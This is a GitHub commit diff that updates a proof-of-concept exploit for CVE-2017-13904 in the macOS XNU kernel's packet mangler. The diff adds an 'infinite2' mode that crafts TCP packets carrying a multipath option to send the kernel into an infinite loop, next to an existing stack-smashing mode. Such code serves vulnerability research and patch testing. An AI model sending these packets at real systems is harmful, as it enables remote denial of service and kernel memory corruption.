Skip to content

Commit 25cf1b9

Browse files
kevinbackhousekevinbackhouse
committed
Update PoC for Mojave
1 parent 4b6a3b8 commit 25cf1b9

1 file changed

Lines changed: 10 additions & 1 deletion

File tree

apple/darwin-xnu/packet_mangler_CVE-2017-13904/cve-2017-13904-poc.c

Lines changed: 10 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -15,6 +15,8 @@
1515
#include <netinet/ip.h>
1616
#include <arpa/inet.h>
1717

18+
#define TCP_OPT_MULTIPATH_TCP 30
19+
1820
// 96 bit (12 bytes) pseudo header needed for tcp header checksum calculation
1921
struct pseudo_header
2022
{
@@ -56,6 +58,7 @@ unsigned short csum(unsigned short *ptr, int nbytes)
5658

5759
enum Mode {
5860
InfiniteLoopMode,
61+
InfiniteLoopMode2,
5962
SmashStackMode
6063
};
6164

@@ -83,6 +86,9 @@ int main(int argc, char* argv[])
8386

8487
if (strcmp(argv[3], "infinite") == 0) {
8588
mode = InfiniteLoopMode;
89+
} else if (strcmp(argv[3], "infinite2") == 0) {
90+
mode = InfiniteLoopMode2;
91+
printf("infinite2\n");
8692
} else if (strcmp(argv[3], "smashstack") == 0) {
8793
mode = SmashStackMode;
8894
payloadsize = 1000;
@@ -117,9 +123,12 @@ int main(int argc, char* argv[])
117123
data = datagram + sizeof(struct iphdr) + sizeof(struct tcphdr);
118124
memset(data, 1, payloadsize);
119125

120-
if (mode != SmashStackMode) {
126+
if (mode == InfiniteLoopMode) {
121127
data[0] = 2;
122128
data[1] = 0;
129+
} else if (mode == InfiniteLoopMode2) {
130+
data[0] = TCP_OPT_MULTIPATH_TCP;
131+
data[1] = 0;
123132
}
124133

125134
// some address resolution

0 commit comments

Comments
 (0)